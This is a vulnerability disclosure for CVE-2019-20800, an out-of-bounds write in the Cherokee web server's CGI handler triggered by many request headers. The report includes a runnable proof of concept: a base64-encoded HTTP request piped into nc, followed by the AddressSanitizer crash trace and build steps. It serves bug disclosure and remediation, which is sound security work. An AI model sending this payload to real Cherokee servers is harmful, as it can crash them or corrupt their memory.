Headline
CVE-2019-20800: CGI Handler too many headers · Issue #1224 · cherokee/webserver
In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many “Host: 127.0.0.1” headers.
struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char *envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to
increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array.
handler_cgi.c:
310 cgi->envp[cgi->envp_last] = entry;
311 cgi->envp_last++;
PoC
echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDQyOTQ5NjcyOTUuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80
ASAN
=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
#0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
#1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
#2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
#3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
#4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
#5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
#6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
#7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
#8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
#9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
#10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
#11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
#12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
#0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
#1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
#2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
#3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
#4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
#5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
#6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
==10864==ABORTING
Setup:
Ubuntu 18.04 64 bit
source code from github, commit 9a75e65
build command:
ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
- files in webroot mkdir /var/www/test{1…20}; for i in seq 1 20; do echo test > test$i/test.html; done
- configuration file cherokee.txt
found by: Mateusz Kocielski, Michał Dardas from LogicalTrust